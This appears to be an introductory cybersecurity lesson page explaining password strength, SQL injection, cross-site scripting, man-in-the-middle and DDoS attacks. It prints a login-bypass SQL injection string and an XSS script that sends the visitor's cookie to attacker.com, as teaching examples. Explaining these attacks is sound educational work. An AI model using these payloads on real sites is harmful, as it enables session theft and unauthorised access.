Welcome to CyberGuard Pro

Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information.

Cybersecurity Concepts

Basic Concepts

Medium Concepts

Advanced Concepts

Password Security

The Brute Force Lab

Complexity is your best defense. Use at least 12 characters, including numbers and symbols.

Understanding Attacks

SQL Injection (SQLi)

Attackers insert malicious SQL code into input fields. If the database executes it, they can bypass security.

SELECT * FROM users WHERE user='admin' AND pass='' OR 1=1 --'

The -- tells the database to ignore the rest of the query!

Cross-Site Scripting (XSS)

An attacker injects malicious scripts into content from otherwise trusted websites. When you visit the site, the script runs in your browser.

<script>document.location='http://attacker.com/steal_cookie.cgi?c='+document.cookie</script>

This code could steal the user's session cookie, allowing the attacker to impersonate them.

Man-in-the-Middle (MitM)

An attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other.

Example: Connecting to a fake public Wi-Fi network that looks legitimate. The network's owner can then intercept your web traffic.

Denial-of-Service (DDoS)

A DDoS attack floods a server with overwhelming traffic, making the service unavailable to legitimate users.

Example: Thousands of compromised computers (a botnet) all try to access a single website at the same time, causing it to crash.

Malware Types

Final Assessment

Loading question...